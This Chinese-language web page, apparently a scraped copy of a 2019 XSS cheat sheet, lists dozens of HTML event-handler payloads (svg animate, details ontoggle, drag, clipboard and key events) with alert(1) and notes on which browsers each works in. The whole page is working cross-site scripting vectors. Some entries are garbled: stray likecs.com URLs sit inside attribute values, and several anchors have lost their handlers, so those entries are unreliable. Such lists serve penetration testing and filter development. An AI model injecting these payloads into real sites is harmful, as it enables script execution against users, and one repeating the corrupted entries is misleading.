跨站脚本（XSS）备忘单-2019版 (2)

svg动画重复时触发（Chrome、Firefox、Safari)

<svg><animate onrepeat=alert(1) attributeName=x dur=http://www.likecs.com/1s repeatCount=http://www.likecs.com/2 />

调整窗口大小时触发（Chrome、Firefox、IE、Safari)

<body onresize=http://www.likecs.com/"alert(1)">

页面滚动时触发（Chrome、Firefox、IE、Safari)

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>

选框开始时触发（Firefox、IE)

<marquee onstart=alert(1)>XSS</marquee>

更改时间轴时触发（Chrome、Firefox、IE、Safari)

<audio controls autoplay ontimeupdate=alert(1)><source src="http://www.likecs.com/validaudio.wav" type="audio/wav"></audio>

展开详细信息标签时触发（Chrome、Firefox、IE、Safari)

<details ontoggle=alert(1) open>test</details>

CSS过渡取消时触发（Firefox)

<style>:target {color: red;}</style><a id=x ontransitioncancel=alert(1)></a>

CSS过渡结束时触发（Chrome)

<style>:target {color:red;}</style><a id=x ontransitionend=alert(1)></a>

CSS过渡开始时触发（Firefox)

<style>:target {transform: rotate(180deg);}</style><a id=x ontransitionrun=alert(1)></a>

未履行承诺时触发（Firefox)

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>

等待数据时触发（IE）

<video autoplay controls onwaiting=alert(1)><source src="http://www.likecs.com/validvideo.mp4" type=video/mp4></video>

需要用户交互的事件处理程序

右键单击或使用鼠标中键时触发（Chrome、Firefox)

<input onauxclick=alert(1)>

需要复制一段文字（Chrome、Firefox、IE、Safari)

<a onbeforecopy="alert(1)" contenteditable>test</a>

要求剪切一段文字（Chrome、Firefox、IE、Safari)

<a onbeforecut="alert(1)" contenteditable>test</a>

需要粘贴一段文字（IE）

<a onbeforepaste="alert(1)" contenteditable>test</a>

需要属性值的变化（Chrome、Firefox、IE、Safari)

<input onchange=alert(1) value=xss>

需要点击一下元素（Chrome、Firefox、IE、Safari)

<a>test</a>

右键单击以显示上下文菜单时触发（Chrome、Firefox、IE、Safari)

<a oncontextmenu="alert(1)">test</a>

需要复制一段文字（Chrome、Firefox、IE、Safari)

<a oncopy="alert(1)" contenteditable>test</a>

要求剪切一段文字（Chrome、Firefox、IE、Safari)

<a oncut="alert(1)" contenteditable>test</a>

双击元素时触发（Chrome、Firefox、IE、Safari)

<a ondblclick="alert(1)">test</a>

触发拖动元素（Chrome、Firefox、IE、Safari)

<a draggable="true" ondrag="alert(1)">test</a>

触发拖动已在元素上完成（Chrome、Firefox、IE、Safari)

<a draggable="true" ondragend="alert(1)">test</a>

需要鼠标拖动（Chrome、Firefox、IE、Safari)

<a draggable="true" ondragenter="alert(1)">test</a>

需要鼠标拖动（Chrome、Firefox、IE、Safari)

<a draggable="true" ondragleave="alert(1)">test</a>

触发拖动元素（Chrome、Firefox、IE、Safari)

<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a>

需要鼠标拖动（Chrome、Firefox、IE、Safari)

<a draggable="true" ondragstart="alert(1)">test</a>

触发删除可拖动元素（Chrome、Firefox、IE、Safari)

<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a>

需要作为价值的变化（Chrome、Firefox、IE、Safari)

<input oninput=alert(1) value=xss>

需要具有不满足其约束的元素（例如必填属性）的表单提交。（Chrome、Firefox、IE、Safari)

<form><input oninvalid=alert(1) required><input type=submit>

按下键时触发（Chrome、Firefox、IE、Safari)

<a onkeydown="alert(1)" contenteditable>test</a>

按下键时触发（Chrome、Firefox、IE、Safari)

<a onkeypress="alert(1)" contenteditable>test</a>

释放按键时触发（Chrome、Firefox、IE、Safari)

<a onkeyup="alert(1)" contenteditable>test</a>

按下鼠标时触发（Chrome、Firefox、IE、Safari)

<a onmousedown="alert(1)">test</a>

当鼠标悬停在元素上时触发（Chrome、Firefox、IE、Safari)

<a onmouseenter="alert(1)">test</a>

当鼠标移离元素时触发（Chrome、Firefox、IE、Safari)

<a onmouseleave="alert(1)">test</a>

需要鼠标移动（Chrome、Firefox、IE、Safari)

<a onmousemove="alert(1)">test</a>

当鼠标移离元素时触发（Chrome、Firefox、IE、Safari)

<a>test</a>

需要将鼠标悬停在元素上（Chrome、Firefox、IE、Safari)

<a>test</a>

释放鼠标按钮时触发（Chrome、Firefox、IE、Safari)

<a onmouseup="alert(1)">test</a>

需要粘贴一段文字（Chrome、Firefox、IE、Safari)

<a onpaste="alert(1)" contenteditable>test</a>